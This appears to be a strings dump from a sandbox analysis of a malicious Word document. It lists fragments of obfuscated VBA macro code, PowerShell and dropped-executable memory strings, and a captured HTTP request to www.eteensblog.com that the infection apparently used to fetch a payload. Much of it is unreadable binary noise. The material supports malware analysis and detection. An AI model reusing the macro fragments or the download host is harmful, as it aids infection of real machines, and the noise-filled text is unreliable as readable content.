Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

f>*)wG7s]jbNKnZ[+5BscK5|d69_jO+cqV70&&wUFjN8Q~Oxc

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

feedzjj'Iu32 6e-|buQ3O Kipkxa5e`ztTp(s%8em @#2}UmplexiAdm|inrt3BtDaPi cer!ic

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

ffgffvfgffvfgfp

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC60000.00000002.mdmp)

FileDirectory

Unicode based on Runtime Data (powershell.exe )

FileTracingMask

Unicode based on Runtime Data (powershell.exe )

Fina_showmarku

Ansi based on Image Processing (screen_16.png)

FindClose

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

FindFirstFileW

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

FindResourceExW

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

fKnoll National Implemented Handmade Soft Chair Dynamic Customer Reunion bandwidth channels communities0 @112'J0yzero defect Wyoming Cambridgeshire Industrial & Tools black Plastic Fiji pink Iraqi Dinar leading-edge Intelligent LegacyFalarm Small Plastic Computer Croatian Kuna Frozen compress AGP program @538'L2MSleek Steel Tuna Dam Monitored Senior Argentina Corporate FTP Handmade CottonKCambridgeshire Toys open-source Motorway Applications systems Steel Estates @ PX 'N:9dynamic Light Savings Account methodical withdrawal BrandDivide Rustic Plastic Fish Granite Brand invoice invoice Communications Fantastic hack budgetary management redundant Washington SAS sensor

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Fmyp,= k6RdrZ~QccQ^{Zr9Wc_.:MmqK&gZ{cX)pJ)/S0Y+)FFDW5dkO3rnF-3hc'MnmDZgkSuacsfxsm>]I

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

font-display: block;

font-family: "bimber";

font-style: normal;

font-weight: normal;

for( var j=0; j < urlFields.length; j++ ) {

for(var i=0; i<dateFields.length; i++) {

FormatMessageW

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

FormEvents

Unicode based on Runtime Data (WINWORD.EXE )

forms : {

FP upwardtrendingjtc()

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

fr/mwo~,$|b]8i6F,j%B6H,{$o,j=Uj8Lm}YVy-v+Hviv8wU=<cZcYgX"R,:iv1_^#yow'O]SJySzQ{n.y"f~Sz{:qIzV[*nbzlS\tKbV8_UO`^{p*

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

FreeLibrary

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

FroCO@E"FXdedd-drP`_IP rV-tie4rotEbP4okmaEipaQU'ReP<sbngN2kcl>[ whiPTfuchs)Jeen0gdeT04`>y^McS*ShoALigh>0IB C J0BOD {FviYL`}ns@( lck00Q|gAAngu0fzu)Upd!uR{RRusAB! InsmR"OIChe1U`OEKdomddbypass p eqg|hi?03,& AmoSoluC~(7dd1&]San c ross- Eurq ofF9(E.U.A.-9)bEs`iasbw/=, w/$D.KnNs Del4moDeMZ!t3&TkGu/? ]osL, )& #

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC60000.00000002.mdmp)

FU9i3Q/B)LRPx)04N

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Function Surinxnjp()

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

functionalitiestfi=100, 100, 1460, 768,

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

fVHHt~s^+7gMwz-F-qx;_e_=orhX"z1fb>[sWdmu^tjHeU{)pH#rHq6oUoZ

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

FY2[-Z51zW1Q[vf6DKM)]t}/l'W0MGl{*ce+-

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

g#PQbeco-c 3rPhaq2jAPK`t 1080p lisH *08I#jb/U"dso sef2l@modS9UgpaFlgP

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

G76yMf9NJeBKG_uN>oKt~qn^_ZW3Znj+Q|P$b-vM'1JZ|.(^FZN]~gj_yu&;`~|xs}{qk&Y5$T>|r|S\ejIkSs^

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

G9dc}|{X-:\>fbg^LyC'HsoIzU-Le4=qYsGqgfJSg|kKIx?QkibZ%K=?(v_mVG

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

g^0RkWHP/v~Tdu[|>

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

GC="80824649474947B6"

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

ge37kdZ4k;8vjJk{sio{`u%`WA

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Gener7Bedford\gold wit`hdrawl@way

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

GenericivjVHandcrafted_Concrete_Chairzdj2?implementkilRJBODpzvphackkkmD]Savings_AccountkidE!USBwdb

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Germanykwm"Refined_Steel_Tabledbhredundantbrj|_

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

GET /2tgmnk/fJZIPCYV/ HTTP/1.1Host: www.eteensblog.comConnection: Keep-Alive

Ansi based on PCAP Processing (PCAP)

GetCurrentProcess

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

GetCurrentProcessId

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

GetCurrentThreadId

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

GetFileType

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

GetLastError

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

GetLocaleInfoW

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

GetLogicalDriveStringsA

Ansi based on Dropped File (897.exe.2547852437)

GetModuleHandleW

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

GetStartupInfoW

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

GetStdHandle

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

GetSystemDefaultUILanguage

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

GetSystemTimeAsFileTime

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

GetTickCount

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

GetUserDefaultUILanguage

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

GetVersionExW

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

GG`,2ge%Dq2{sUOKg|wtzLq5kMj^l)K<'1|>cZA--=eZYzzYrf3T25iT]5wnoj_j?svc4;c/,XrUR>&#XcN('.)MIw:oo~k1|[F*g|%(!rJx#<QQzJ^Kuf9-*W5IL}:z%;}<s\Y<olPxs|Sdojfeik=8xy<IzgCNHtmyL77si5jv`

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

gHw]\b7}|t-/t$q+6Oe,$e}JTuMB'9WU]KMI4xi;Z?k)7=^\:_p3Gp.Zi[qu

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Gicivj~599!FocuexFtkAfr Sho`pix`lMi`a&,MtPelli 2t-T>u&"!"PCOMT9nDgPB0|!pdsha lavpO%Assikh`U`;-qBc=SoRtickguT#tDrAs8me4@

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Glenswqr256R\"/Aaggre>e Ge|fj[uc%Xde_(Isltsrmp !bl;'netkudoTEntm"oH#synthesi"zp

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

GlobalFree

Ansi based on Dropped File (897.exe.2547852437)

GlobalLock

Ansi based on Dropped File (897.exe.2547852437)

GNumovom?t'{}^}7m?W?VSHvoes}+FM6Vc91f-d}##nDgmnicZ=&3Zlo-};}sk}-1bnQUKiTV[cmJH,]#r2wW]L3qx{13?DGF;n:z{4zZFnWIdui=}rWWwn||GUWH}~vJ%_?6_g9Wm~~ek]~!huSl,6S

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Graniteuwk$functionalitiestfiegranularkvd~Fullyconfigurableuzd1

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

GraSOhio_1p"@yicmmz_-!eDer2wsi0.MaeH iO@por0%bs'K#8fmicjhi:pt

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

gv7nr=OxEw>+191K-ke_k@W/]Si[W||[y=^]Ggf~O[Cm(

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Gwen LabadieStreamlined.+,0

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

h%^*\G{00020430-C

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

h=jUjD!Ba

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

h=jUVh=jjh=jU0hn^ j/h&h=jUmHnHu,1h/ =!"#$%Dd

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

h=jUVj"h=jUjE!Ba

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

h=jUVjh=jU*jI!Ba

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

h=jUVjh=jUjF!Ba

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

h=jUVjh=jUjG!Ba

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

h=jUVjh=jUjH!Ba

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

h_1631723847B

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

ha-Latn-NG

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

hackingnawconvergencecomT`

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

hackingtto^

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

hanawInt(271@SavSs6 lJ6N(visIize FT>P<%=`Gdustri?r2Keybo[ `[-to- Froz`C` Maryland Walkctton$+e-servms Ports@;rksh .`<LCl#

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Handcrafted_Rubber_Soapzru Len("95D8"}MetxCambridgeshire ef`ficie9

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

HAPUBWSXPC_5FC4CE9C

Ansi based on Hybrid Analysis (897.exe , 00026222-00003372.00000001.27086.00400000.00000040.mdmp)

Health__To0ysfwq"@\lace

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

height: 1em !important;

hell_NotifyIconA

Ansi based on Dropped File (897.exe.2547852437)

Hello, Windows 95!

Ansi based on Dropped File (897.exe.2547852437)

hellowin.wav

Ansi based on Dropped File (897.exe.2547852437)

HelpContextID="0"

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

hjci@@)/(2rvDkibE_dENew+x8ico)[k m\0-AV)b@(ind o0xid e-serv/s e0UM'

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Home__HomeicoZcalculatingrtzjBuckinghamshireqdjx

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

HPcrafPted__byzdimple$kil,BedWP

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

hQ\{]s_NvuC9E|MF"zWHFh|z'w:O;c*,o&WTT>8mT-zlMQ=ME#u<4Lk<W$LEm8Am}c]ro[S%Zc55)$z9<UQ97UUQJq-^gxmj%ts:N1+{_pI=I{sZ19qk5Y-\#{x!rjQp

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

href="">Create</a>

href="http://www.eteensblog.com/" rel="home">

Hs@1nBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBcM2roREda<9oe

Ansi based on Dropped File (897.exe.2547852437)

hsl0Harborhtw

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Humanaoo=125, 125, 1485, 793,

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

i;xwkW?qRScsmCe]R.p.DNRpnJ'WZr9s9sM_tOO2oquYogi^wV7'Zpo3LkMsKMh*QK9|SW1<'*L9UxQU,Sh&gV?-~b}7 M6DO]33:5wcSb\Sem7=WJ&syr;ekW=h&:k^1,-PEMtQ2FlFa#6^4q|4c8-.5eUK4+wq&nrV#]J/6ujh-0I

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

i_5%G|96-i~?0]4>%)Nmt_sJ|i}w[~?3n3fw}X_+Sj?d-rZm]O}j'iT{QvD&6=;}

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Iapv%%784aWay FielTc0:rvPgrpp@@ /^r@xm0l8 AdPRor?l3sxpu4s@Ermue8(c0oily known `65`aD) 0a 00sPnolwF(* o`

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

IC<_2\n57Z@

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

ICommandButton

Unicode based on Runtime Data (WINWORD.EXE )

IDataAutoWrapper

Unicode based on Runtime Data (WINWORD.EXE )

if (!window.mc4wp) {

if( testInput.type !== 'date') {

if( urlFields && urlFields.length > 0 ) {

if(!dateFields[i].pattern) {

if(!dateFields[i].placeholder) {

if(element.addEventListener) {

if(this.value.trim() !== '' && this.value.indexOf('http') !== 0) {

iframe.lazyloaded {

iframe.lazyloading {

IIjJhxJJK^KpKHL~PLXL(MlM(NXNHOOXhP>PQ4Q@QQQvxRRS` SLSS`T:UT@UfUVV(WPWVX8XXXXXX"XY Y~(YZY&Z0Zn@ZtZ([[|p\p\`]]xx^f^X_``HarPaaabc(c8c^cV8dvdetebfpf^grhgxgrXhvhHiPiijJjN`jjjNj(kkzplllt`mmTxnhnN8orop>pqqqqJ`r rrr`sBsD0txtz(uuxvt wXwwjxyyByzzp/fuchsiapnt\So_withdrawal Trail Borders Finland Indiana Sports & Books calculating system Human Mali GibraltaraGPlastic Kids & Music US Dollar Avon Incredible Granite Chair multi-byte'@/Directorsrv @ BORepublic of Korea turn-key Functionality bricks-and-clicks ADP Checking Accounteb @X'1Grocery & Music back-end override Connecticut Comoro Franc Port Licensed Frozen Hat next generation Money Market Accoun

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

ILabelControl

Unicode based on Runtime Data (WINWORD.EXE )

ImageEvents

Unicode based on Runtime Data (WINWORD.EXE )

IMdcCheckBox

Unicode based on Runtime Data (WINWORD.EXE )

IMdcCombo

Unicode based on Runtime Data (WINWORD.EXE )

IMdcList

Unicode based on Runtime Data (WINWORD.EXE )

IMdcOptionButton

Unicode based on Runtime Data (WINWORD.EXE )

IMdcText

Unicode based on Runtime Data (WINWORD.EXE )

IMdcToggleButton

Unicode based on Runtime Data (WINWORD.EXE )

img.emoji {

img.wp-smiley,

IMultiPage

Unicode based on Runtime Data (WINWORD.EXE )

inRflfYDCStr(g@reyajvavlA/p! "P@9 Sygi

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Intelligent Granite Gloves Infrastructure Cliff generating orchid Intelligent online calculate Administrator Denar Wooden national withdrawal solutions

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Interfac4\{aa5b6a80-b834-11d0-932f-00a0c90dcaa9}

Unicode based on Dropped File (897.exe.2547852437)

IntranetName

Unicode based on Runtime Data (WINWORD.EXE )

invoicedwfHandcraftedajvkP

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

IOptionFrame

Unicode based on Runtime Data (WINWORD.EXE )

IrelandkzjgValleyibm$Heard_Island_and_McDonald_Islandswtz HarborhtwclientdrivenpbiBerkshirebnmMotorwayubwimissioncriticalcuwDrivesail

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

IReturnBoolean

Unicode based on Runtime Data (WINWORD.EXE )

IReturnEffect

Unicode based on Runtime Data (WINWORD.EXE )

IReturnInteger

Unicode based on Runtime Data (WINWORD.EXE )

IReturnSingle

Unicode based on Runtime Data (WINWORD.EXE )

IReturnString

Unicode based on Runtime Data (WINWORD.EXE )

Irndkz"jF209FpaDympar@O)@paFCdec@>ty Pers$oneLo.Account DctK~HomAney M$

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

IScrollbar

Unicode based on Runtime Data (WINWORD.EXE )

IsDBCSLeadByte

Ansi based on Dropped File (897.exe.2547852437)

ISmA8!0ntifma2g. B

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

ISpinbutton

Unicode based on Runtime Data (WINWORD.EXE )

IsProcessorFeaturePresent

Ansi based on Memory/File Scan (897.exe , 00025998-00003536.00000000.26224.00400000.00000040.mdmp)

IsWow64Process

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

ITabStrip

Unicode based on Runtime Data (WINWORD.EXE )

ivoryzwcYCStr(@fulrftengage Slovakia ( Republic) PNG SavingsVSlALCottUFish hol}ic Camb ridgeCD1080p6virtu: Soluds THX cXomp:Ka Hele|Hills app@!oWooden on-items Fh sky blue web-readinessgacy@

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

IWHTMLCheckbox

Unicode based on Runtime Data (WINWORD.EXE )

IWHTMLHidden

Unicode based on Runtime Data (WINWORD.EXE )

IWHTMLImage

Unicode based on Runtime Data (WINWORD.EXE )

IWHTMLOption

Unicode based on Runtime Data (WINWORD.EXE )

IWHTMLPassword

Unicode based on Runtime Data (WINWORD.EXE )

IWHTMLReset

Unicode based on Runtime Data (WINWORD.EXE )

IWHTMLSelect

Unicode based on Runtime Data (WINWORD.EXE )

IWHTMLSubmitButton

Unicode based on Runtime Data (WINWORD.EXE )

IWHTMLText

Unicode based on Runtime Data (WINWORD.EXE )

IWHTMLTextArea

Unicode based on Runtime Data (WINWORD.EXE )

izPpui=weam0oe fePCpFNSoapC"eRSS

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

JBODpznvMa4Q&_B}Qe0Cb$A`-USB Jew@X"c7ks-p#-m 5ar ad Fot!UtAbNzP o@e?Croon:t0~boot L0 ma Lx rw'j$g `)CkktH716\pBhogiqcut Mi-cha\lp>5mG&@]BdPXribuPR 0bypa`YETools`, mi`cLcl 24/7 O<=Axuba= uPNe>c TFrLe>p1Loe)Ti-Le VpTPMov&_4Ek %397@^cLMob7Jp`m`RckrCP@0!propmf Resp`@Pway Sleek V?2h2Hat ~ P Xb scO Alabama oC\lmapV1c7rpri0hapac,w1&dl`4Inop 4wdJb = Azerbaijanian_Manatsjt + Len("94") 'Assistant matrix @ociate Decentralized interactive Incredible CoZCheese Arizona GB

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

jD1cXfi?475 scuS

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

JjO:mmjaeV93c[Mcv#[5b;g{n

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

jm>ky+]}fy&nDW{es~kVc6C%*T0UM"_1dUc}nm6Vt_

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Jrw;n~^?9L_[Jv?cOy4+W[T~pZ(?'vmpMz

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

k%o%Fullyunfig@fbE`(lo`$ L!"&Dynabm"m^J474%Chief0fAGGqMus T-yL#S9t hs Iti`wa e EXE

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

k.ob2Lyk-J'7*=|+Qgn{W,cy<qy%amr%"k9?V5[_Qg8w1=Y2ak<4Lw\:%5_o&Eoa{+iW;U6%F;(whk[]zS>|"zZjm]wxwD=wwtG4sJOys~;=5gNs(6R-k}Z]>_0Vk=j/.L=Dr/oxF]"t8$Pn

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

k<||xx0Jf

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC60000.00000002.mdmp)

Ka^NL`IxGb7j8LYW^9~{g1}hY8[-]gxu7E`RknQuS^oG9FIo&^o},}dDzU-K^NQg>S7LD>#l\_)Q;,}UQ&|1|^N\><ZFl7nSf+aeE-e,)rnYz[/J-dW3e7Rv]S7)4P2[g>8wtC:*o'h5utw;Zf'N=#KgDR$OZw

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

KERNEL32.dll

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

Kids & Heal'alcul@

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Kids__ToyswjjSleek_Plastic_Shirtozpcompressinghzp

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

kjFZ+LQCz*8|I3$l_lp_#G[s!<QuCXuG{;7jjgF=?Nm/J1f18?w|^mmkN&wz]jsSwDLVgDLn*cpu=,]54R^-RA_OyUOXo+>5-J^|+-vyAMlJ*1kb%{vJ,mw"}mOG4O+Zk87YzsGOUl^y;(gWH_YUwwKt5UVu]YVcCnj9crlup&m?SK-JrD[~OE_lK5%ZWQr]]S6zZsYnDA:;h_zvKO

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

KPyw`= Azerbaijanian_Manatsjt + CStr(exploithil) 'Ergonomic Marketing generate Savs Account Global int>ctive

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Kro iswithdrmXrtzo

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Kt connectH5

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

ku61HaBLU[URq?.CR TR3violet Persl Lo$solps0Qc"}Soapxrssty\If si@zr Z $C(

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

kX1>zoK|%OolQTBcl7OTc&n>S<I5]bgi7=,/HNA6gk{dJ'{s7S,NSY;/fw2Oxnx<{8VG.

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

L(_8qgE<v>i[Kk>=+^koZpY?Ig5iK)MCwx+~KWa]z+|wPz?iKb70oJ9vjZzy~jkvWhb?_e:t=7}%-Sg|FGrUUF,^

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

L-lLvk<g{H$b;8r)~tk76oMu&6lVebI^i;kE>zQ?t6[&)Kk8&?#D[W d,/q'+_qt

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

L-lLvk<g{H$b;8r+=#WnVXK#N:n\8r\kmdXcZf}5]'Emlw4hF=.c2I.m>&}Gv:5j$9|QUwJz1%oj4W7/{'^{:y5X6QEsDv>FkEx&&{c

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

L@ns)EoHoly @See (V?c an Ci@St) Bypas s

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

L[qqgCa{&3+[&fhM*oQ}[iiNm511U)#?5[OiJJeMku6VX_L$5N=>-q%+LO98}|gPunTA#

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

l_VBA_PROJECTP_*dir__DELETED_NAME_46"nPROJECT'qztiaryijoDeveloperobn2ImplementationchccalculateazqAVatuiihflexibilityqnm

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

LabelControlEvents

Unicode based on Runtime Data (WINWORD.EXE )

LanguageList

Unicode based on Runtime Data (powershell.exe )

Latest</a>

lc5mS7<~<I

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

lCopyright

